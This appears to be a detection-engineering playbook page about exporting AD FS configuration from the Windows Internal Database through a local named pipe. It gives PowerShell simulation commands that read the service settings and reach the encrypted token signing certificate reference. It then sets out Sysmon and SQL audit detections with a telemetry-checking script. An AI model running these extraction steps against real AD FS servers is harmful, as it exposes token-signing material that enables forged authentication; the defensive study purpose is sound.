Export AD FS Configuration via a Local Named Pipe

Locally, the AD FS WID does not have its own management user interface (UI), but one could connect to it via a specific named pipe. Depending on the WID version, one could use the following named pipes to connect to the AD FS database and query its configuration settings:

  • WID 2008: \\.\pipe\MSSQL$MICROSOFT##SSEE\sql\query

  • WID 2012+: \\.\pipe\MICROSOFT##WID\tsql\query

Preconditions

  • Integrity level: medium

  • Authorization:

    • Resource: AD FS Database

    • Identity:

      • AD FS Service Account

      • Local Administrator

  • AD FS Server

    • Services:

      • Active Directory Federation Services (ADFSSRV)

Simulation Steps

Get Database Connection String via WMI Class

The named pipe information can be obtained directly from the ConfigurationDatabaseConnectionString property of the SecurityTokenService class from the WMI ADFS namespace.

  1. Connect to the AD FS server via the Azure Bastion service as the AD FS service account.

  2. Open PowerShell and run the following commands:

$ADFS = Get-WmiObject -Namespace root/ADFS -Class SecurityTokenService
$conn = $ADFS.ConfigurationDatabaseConnectionString
$conn

Connect to the Database and Read Configuration

  1. Use the connection string to connect to the AD FS database (WID) and run a SQL SELECT statement to export its configuration settings from the IdentityServerPolicy.ServiceSettings table.

$SQLclient = new-object System.Data.SqlClient.SqlConnection -ArgumentList $conn
$SQLclient.Open()
$SQLcmd = $SQLclient.CreateCommand()
$SQLcmd.CommandText = "SELECT ServiceSettingsData from IdentityServerPolicy.ServiceSettings"
$SQLreader = $SQLcmd.ExecuteReader()
$SQLreader.Read() | Out-Null
$settings = $SQLreader.GetTextReader(0).ReadToEnd()
$SQLreader.Dispose()
$settings

You can also parse it as an XML object:

[xml]$settingsXML = $settings
$settingsXML

From here, you can get to the encrypted token signing certificate:

$settingsXML.ServiceSettingsData.SecurityTokenService.AdditionalSigningTokens.CertificateReference

Detection

Detect Named Pipe Connection

The connection to the AD FS database occurs via the \\.\pipe\microsoft##wid\tsql\query named pipe, and we could monitor for the connection to it with Sysmon Event ID 18 (Pipe Connected).

Azure Sentinel Detection Rules

Detect AD FS SQL Statement to Export Service Settings

If we want to monitor for anyone interacting with the WID database via SQL statements, we need to create a server audit and a database audit specification. We can use the Microsoft SQL Server PowerShell module to connect to the database and create the audit rules.

Create SQL Audit Rules:

  1. On the AD FS server (ADFS01), open PowerShell as Administrator.

  2. Install the SqlServer PowerShell Module.

Install-Module -Name SqlServer
Import-Module SqlServer

  3. Create SQL Audit Rules.

Invoke-SqlCmd -ServerInstance '\\.\pipe\microsoft##wid\tsql\query' -Query "
USE [master]
GO
CREATE SERVER AUDIT [ADFS_AUDIT_APPLICATION_LOG] TO APPLICATION_LOG WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE)
GO
ALTER SERVER AUDIT [ADFS_AUDIT_APPLICATION_LOG] WITH (STATE = ON)
GO
USE [ADFSConfigurationV4]
GO
CREATE DATABASE AUDIT SPECIFICATION [ADFS_SETTINGS_ACCESS_AUDIT] FOR SERVER AUDIT [ADFS_AUDIT_APPLICATION_LOG] ADD (SELECT, UPDATE ON OBJECT::[IdentityServerPolicy].[ServiceSettings] BY [public])
GO
ALTER DATABASE AUDIT SPECIFICATION [ADFS_SETTINGS_ACCESS_AUDIT] WITH (STATE = ON)
GO
"
  4. Validate the SQL audit rule by re-running the previous simulation steps, either as the AD FS service account or as a local administrator.
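The following script is an added example, not part of the original playbook, for checking both telemetry sources described above after the validation run: Sysmon Event ID 18 for connections to the WID named pipe, and the SQL Server audit records that the server audit above writes to the Application log. It assumes Sysmon is installed with pipe events enabled, and that the audit records appear as Event ID 33205 from provider MSSQL$MICROSOFT##WID (the standard SQL Server audit event ID; the provider name for WID is an assumption to verify on your host).

```powershell
# Added example (not from the original playbook). Run on the AD FS server as Administrator.
$WidPipe = 'microsoft##wid\tsql\query'   # tail of the named pipe, matched case-insensitively

# 1. Sysmon Event ID 18 (Pipe Connected): which processes connected to the WID pipe.
function Get-WidPipeConnections {
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Sysmon/Operational'
        Id      = 18
    } -ErrorAction SilentlyContinue | ForEach-Object {
        $x = [xml]$_.ToXml()
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if ($d.PipeName -like "*$WidPipe*") {
            [pscustomobject]@{
                Time     = $_.TimeCreated
                Image    = $d.Image
                User     = $d.User      # field may be absent on older Sysmon versions
                PipeName = $d.PipeName
            }
        }
    }
}

# 2. SQL Server audit records in the Application log. The message text carries the
#    statement, so filter for the table the audit specification covers.
function Get-WidServiceSettingsAudit {
    Get-WinEvent -FilterHashtable @{
        LogName      = 'Application'
        ProviderName = 'MSSQL$MICROSOFT##WID'   # assumed provider name for the WID instance
        Id           = 33205                    # SQL Server Audit event
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'ServiceSettings' } |
        Select-Object TimeCreated, Message
}

'--- Sysmon pipe connections to WID ---'
Get-WidPipeConnections | Format-Table -AutoSize
'--- SQL audit records touching IdentityServerPolicy.ServiceSettings ---'
Get-WidServiceSettingsAudit | Format-List
```

A legitimate AD FS process (Microsoft.IdentityServer.ServiceHost.exe) connects to this pipe constantly, so the useful signal is an unexpected Image or User in the Sysmon results, and any audit record whose statement reads ServiceSettingsData from a session that is not the AD FS service.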

Azure Sentinel Hunting Queries

Output

  • AD FS Configuration Settings